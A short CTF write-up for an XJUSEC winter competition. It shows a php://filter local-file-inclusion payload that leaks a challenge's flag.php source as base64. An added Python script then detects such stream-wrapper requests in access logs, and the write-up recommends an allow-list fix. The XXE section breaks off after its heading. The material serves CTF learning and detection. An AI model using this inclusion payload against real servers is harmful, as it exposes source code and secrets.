The following is my write-up (WP) for the challenges I solved in this XJUSEC winter break competition.
WEB
Include
Opening the challenge shows the following:
After reading up on file inclusion vulnerabilities, I constructed the payload:
?file=php://filter/read=convert.base64-encode/resource=flag.php
This returns the base64-encoded source code:
PD9waHANCgkkZmxhZyA9ICdmbGFne2luY2x1ZDNfczBfZXp9JzsNCj8+DQo8aHRtbD4NCjxoZWFkPg0KCTxtZXRhIGNoYXJzZXQ9IlVURi04Ij4NCgk8dGl0bGU+WEpVU0VDIE9OTElORTwvdGl0bGU+DQoJPHN0eWxlPiANCgkJYm9keXt0ZXh0LWFsaWduOmNlbnRlcn0gDQoJPC9zdHlsZT4NCjwvaGVhZD4NCg0KPGJvZHk+DQoNCjxib2R5Pg0KDQoJPHA+ZmxhZ+WwseWcqOi/memHjO+8jOS9huWwseaYr+eci+S4jeWIsO+8jOWlveawlOWTpu+8gTwvcD4NCg0KPC9ib2R5Pg0KDQoJDQo8L2h0bWw+
Decoding:
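Seen from the defending side, the php://filter request used above stands out in web server logs. The following is an added example, not part of the original write-up: it scans access-log lines for stream wrappers in query parameters. The log format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Stream wrappers that have no business appearing in a request parameter.
WRAPPER_RE = re.compile(r"^\s*(php|data|expect|zip|phar|file|glob)://", re.I)
# Filter chains such as read=convert.base64-encode, used to leak source code.
FILTER_RE = re.compile(r"(convert|string)\.[\w.-]+", re.I)
# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_unquote(value, max_rounds=3):
    """Normalize a value that was URL-encoded more than once."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return (param, normalized value, reason) findings for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group(1)).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_unquote(raw)  # parse_qsl already decoded one layer
        if WRAPPER_RE.search(value):
            reason = "stream wrapper"
            if FILTER_RE.search(value):
                reason += " with filter chain"
            findings.append((name, value, reason))
    return findings


# Constructed sample log lines (not taken from the challenge server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Feb/2021:10:00:00 +0800] "GET /index.php?file=about.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Feb/2021:10:00:05 +0800] "GET /index.php?file=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Feb/2021:10:00:09 +0800] "GET /index.php?file=%2570hp%3A%2F%2Ffilter%2Fresource%3Dflag.php HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for name, value, reason in inspect_line(entry):
            print(f"ALERT {reason}: {name}={value}")
```

Detection like this complements the fix on the server, which is to map the file parameter onto a fixed allow-list of pages instead of passing it to include.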
Xxe
Study first, then solve the challenge.
Capture the request: